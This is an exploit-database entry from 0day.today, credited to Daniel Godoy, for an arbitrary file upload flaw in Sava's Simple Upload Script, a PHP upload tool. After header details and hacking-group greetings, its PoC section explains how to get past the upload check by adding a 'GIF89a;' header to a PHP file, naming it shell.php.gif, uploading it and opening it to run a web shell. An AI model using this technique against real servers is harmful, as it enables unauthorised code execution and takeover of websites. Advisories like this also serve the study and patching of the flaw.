Sava’s Simple Upload Script / Arbitrary File Upload

2012-07-03T00:00:00
ID 1337DAY-ID-18911
Type zdt
Reporter Daniel Godoy
Modified 2012-07-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Sava’s Simple Upload Script / Arbitrary File Upload
# Date: 03/07/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Sofware web: http://savasplace.com/wp-content/plugins/downloads-manager/upload/upload.tgz
# Tested on: Linux
#
# www.chap.cl
# Este Advisory fue descubierto por Daniel Godoy, integrante de Project CHAP Security
# be secured / stay secure
# [email protected]


[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group
 
[PoC]
add GIF89a; and rename your php file whit name: shell.php.gif
http://localhost/upload.php
http://locahost/files/shell.php.gif



#  0day.today [2018-04-15]  #